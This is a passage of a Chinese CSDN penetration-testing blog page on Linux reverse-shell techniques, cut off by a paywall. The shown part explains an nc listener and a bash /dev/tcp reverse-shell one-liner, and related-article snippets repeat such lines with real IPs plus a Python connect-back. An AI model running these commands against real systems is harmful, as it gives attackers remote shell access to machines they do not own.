内网渗透-反弹shell的N种姿势

已于 2023-01-20 10:27:08 修改
阅读量761 收藏 2
点赞数
分类专栏: 内网渗透 文章标签: 安全性测试 web安全 安全
于 2022-09-04 23:14:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/126673905
版权
本文详细介绍了在内网渗透测试中,针对Linux服务器如何利用Bash、telnet、nc(netcat)以及多种脚本语言(如Python、Perl、Ruby等)进行反弹shell的操作。文中列举了各种方法的具体命令行示例,包括监听和目标主机上的执行命令,旨在汇总常见的反弹shell技巧。
摘要由CSDN通过智能技术生成

反弹shell的N种姿势

文章目录

0x00 前言

在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。

0x01 Bash反弹

1.1 方法一

攻击者主机上执行监听:

nc -lvvp port

目标主机上执行:

bash -i >& /dev/tcp/x.x.x.x/port 0>&1
#bash -i 打开一个交互的bash
#>& 将标准错误输出重定向到标准输出
#/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口
#0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互

注:/dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相

了解本专栏 订阅专栏 解锁全文 超级会员免费看
炫彩@之星
关注
专栏目录
订阅专栏
反弹shell的各姿势
08-12 2万+
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。所有姿势整理自络,假设,攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。 Linux 反弹shell 姿势一:bash反弹 bash -i &gt...
CTF内网渗透笔记
qq_26579613的博客
11-10 4018
一、漏洞挖掘相关工具的使用 NMAP扫描工具使用 1.扫描指定的IP范围 nmap 192.168.0.101-110 2.扫描指定的IP段 nmap 192.168.0.* --exclude 192.168.0.100 3.扫描指定址的操作系统类型(深度扫描) nmap -A 192.168.0.101 or nmap -O 192.168.0.101 4.扫描络内活跃的主机(该命令会跳过端口扫描或检测) nmap -sP 192.168.0.* 5.快速扫描主
内网转发——反弹shell
cxrpty的博客
03-16 1143
内网转发的目的: 渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。 代理方式: 正向代理:正向代理是服务器开放端口,客户端主动访问服务器的端口。正向代理的过程是它隐藏了真实的请求客户端,服务端不知道真实的客户端是谁,客户端请求的服务都被代理服务器代替来请求。 反向代理:反向代理是客户端开发端口,服务器连接客户端。反向代理是相对于服务...
反弹shell常见方法总结
qq_45746681的博客
10-08 851
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一.Bash反弹二.telnet反弹三.nc反弹四.常见脚本反弹: 前言 记录并总结下常用到的各反弹shell姿势,方便以后使用 环境:攻击机:windows,192.168.0.105 服务器:kail,192.168.0.107 一.Bash反弹 首先在攻击机上执行 nc -lvvp 3333 进行监听 在kail机上执行 bash -i >& /dev/tcp/192.168.0.105/3333
无需公IP反弹shell
最新发布
qq_74263993的博客
08-22 249
Windows10(关掉病毒实时查杀,尽量别开防火墙)5.上传木门到Windows10并运行拿到shell。kali机(络畅通,具有ipv6地址)3.设置msfconsole,生成木马。2.查看自己的ipv6地址。1.启动kali提权。
内网渗透-常用反弹shell方法总结
lza20001103的博客
04-15 2527
内网渗透-常用反弹shell方法总结
shell反弹方法
weixin_46626737的博客
05-16 2789
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
反弹Shell的方式和详解
热门推荐
Kevin's Blog
06-18 1万+
文章目录一、介绍1.1 含义1.2 目的二、反弹方式2.1 Bash反弹shell2.1.1 适用对象2.1.2 操作方法2.1.3 命令原理 声明:以下的反弹shell的介绍只适用于学习和授权情况下的操作,请勿用于非法环境! 一、介绍 1.1 含义   攻击者所在机器连接目标机器为正向连接(如:远程桌面、ssh等),反向连接弹shell反弹shell为攻击者为服务端,受害者主机主动连接攻击者的服务端程序) 1.2 目的 攻击了一台主机需要在自己的机器上交互式地执行目标机器中的cmd/bash命令
内网渗透-反弹Shell
道阻且长,行则将至。
07-07 3327
概述 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、we
内网渗透-内网信息搜集
cdyunaq的博客
03-25 1333
前言 当我们能访问到⽬标内⽹任何资源之后,我们就可以对 ⽬标内⽹进⾏更深层次的信息搜集⽐如:主机收集、IP 段搜集、端⼝开放服务、Web 资产数量、漏洞类型。接下来是一些工具的食用姿势,仅供参考。 假设我们已经获取到 web-2012 的权限,接下来如何对内⽹进⾏信息搜集,内⽹扫描。 信息收集 主机存活探测 基于netbios的内网存活主机发现 netbios简介 IBM公司开发,主要用于数十台计算机的小型局域。该协议是一在局域上的程序可以 使用的应用程序编程接口(API),为程序提供了
【靶场】双重内网渗透测试场景_利用冰蝎搭建隧道,2024年最新手把手教你5G时代Webview的正确使用姿势
2401_84253850的博客
04-18 1055
bash -i >& /dev/tcp/公ip/端口 0>&1。发现tomcat 的ip为192.168.20.1:8080。上传webshell:这里是tomcat弱密码漏洞。注意这方式不稳定不怕麻烦使用frp代理。执行./frpc -c frpc.ini。卡中有30段:测试是否出
内网渗透——红日靶机学习(一)
jammny
11-13 6383
前言 开启内网学习,域渗透之路... 环境搭建 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 内网拓扑: 我选用wmware ESXI进行内网环境搭建,内网搭建如下: WIN7(web服务器):172.26.16.123/192.168.52.143 WIN2008(域控):192.168.52.138 WIN2003(域成员):192.168.52.141 渗透测试 一、外打点 信息收..
常用的反弹shell的语句
qq_42133828的博客
07-03 771
shell编码:http://www.jackson-t.ca/runtime-exec-payloads.html bash命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i >& /dev/tcp/65.49.135.12/8888 0>&1 & perl版本:...
端口映射后的公反弹shell
来到了学渣的博客
04-01 3360
前言: 渗透一个站最后获取该web服务器权限的时候,可能会思考,如何把公的IP反弹到自己内网(私有ip)的虚拟机上?这时候我们就需要把内网的ip和端口映射成一个公的ip和端口从而实现内网穿透。 这里我用的是NATAPP,一个基于ngrok的国内高速内网转发工具 https://natapp.cn/register 首先快速注册,然后购买免费隧道(非常适合我这样的穷学生) 我这里用的是TC...
关于反弹shell的学习
weixin_74020633的博客
06-14 775
反弹Shell(也称为反向Shell)是一技术,通常用于远程访问和控制目标计算机。反弹Shell的工作原理是,目标计算机主动发起连接到攻击者的计算机,从而绕过一些常见的安全措施,如防火墙和NAT(络地址转换)。这技术常用于合法的远程管理和测试环境中,但也可能被恶意攻击者利用进行未授权的远程控制。通俗一点讲就是当存在一台攻击机和一台被攻击机时,攻击机(也就是客户端)连接被攻击机(服务端)叫做正向连接,那么反弹shell就是反向的连接,客户端为被攻击机,服务端为攻击机,由被攻击机连接攻击机。
【Try to Hack】无公ip如何反弹shell
开心星人的博客
06-19 2069
内网kali端口监听 进行内网穿透,下载花生壳(免费的),需要注册才可以下载 https://www.oray.com/ 点击映射数,会跳转到浏览器 点击新增映射 内网主机为kali的IP 分配了域名和端口打开一个题目 传参 s546459d57.zicp.fun 23494为分配的域名和端口反弹shell...
内网渗透之Linux反弹shell(一)
不知名白帽的博客
08-22 2252
内网渗透之Linux反弹shell(一)(Linux mkfifo命令基本用法、Linux标准文件描述符、重定向、01NC正向Shell、02NC反向Shell)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值